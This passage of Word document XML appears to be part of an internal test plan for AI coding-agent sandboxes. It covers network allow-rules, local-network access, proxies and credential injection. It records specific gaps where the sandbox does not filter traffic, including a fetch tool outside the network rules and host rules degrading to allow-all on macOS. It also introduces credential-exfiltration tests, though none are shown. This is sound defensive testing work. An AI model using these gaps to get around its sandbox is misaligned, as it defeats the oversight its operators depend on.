              <w:t xml:space="preserve">✅ subdomain · ⛔ apex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Matching rules documented only for CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Managed ∩ user, no overlap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Managed allows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">github.com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; user allows only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pypi.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Every host denied</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; dialog/policy shows closed list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Reach host's local dev server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Start </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">python -m http.server 8000</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on the host yourself; agent runs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl localhost:8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Local network </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">off by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Local network </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">on by default</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · ⚠️ Known Windows bug: loopback to host processes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">times out</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (app#4278) — see GH-28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Off by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Local network ON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Enable local network; repeat NW-08 and curl a LAN IP (e.g. printer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Windows: localhost (supported build) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">and private network</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> reachable · WSL2: not host localhost directly; via built-in proxy only, subject to host rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Host rules with local network OFF</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowedHosts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> set + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowLocalNetwork: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Sandboxed commands </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">don't start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Commands don't launch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Agent-started server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Agent runs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npm run dev</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl localhost:3000</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the same sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ WSL2 (private net namespace) · 🔍 Windows with proxy active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Corporate upstream proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">proxy.url</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> set (managed); curl through it, check proxy logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Traffic via proxy; URL shows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">(managed)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; Windows needs local network ON; Linux needs IPv4 proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Managed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 No user key; managed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Uses system proxy settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Built-in fetch / browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ask agent to fetch </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">http://localhost:8000</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with its web tool; open Integrated Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">web_fetch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> follows local-network setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Integrated Browser follows sandbox </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowNetwork</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + allowed/denied domains (denied wins). ⚠️ The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">fetch-page tool is not covered</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> by sandbox network rules (vscode#339644) — restrict it with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChatAgentNetworkFilter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> device policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">IP and CIDR rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Allow </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">203.0.113.10</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; separately try </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">203.0.113.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ single IP · ⛔ CIDR </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Remote MCP connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">With local network off, connect a remote MCP on a private address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Local-network setting applies when MCP sandboxing on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">macOS note (not our fleet, but admin Macs):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a CLI report against 1.0.64 found the Seatbelt backend can't filter by hostname — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allowedHosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> degraded to allow-all and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blockedHosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was rejected (</w:t>
      </w:r>
      <w:hyperlink r:id="rId3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">cli#3861</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). A docs fix was linked; re-test NW-03/NW-05 on any Mac before relying on host rules there.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">With the sandbox ON, tools get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">placeholders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and a local proxy injects real values only into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to approved hosts. With it OFF, tools see your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">real</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tokens — the exfiltration tests below should </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">succeed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when OFF, which proves why ON matters. Use a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">disposable test PAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and a request-echo endpoint you own (e.g. an internal echo service), not a public one.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1771"/>
        <w:gridCol w:w="1601"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1108"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPS git push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Agent: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git push origin test-branch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Real creds injected at original host/port/repo only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ ("Git credentials" on)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
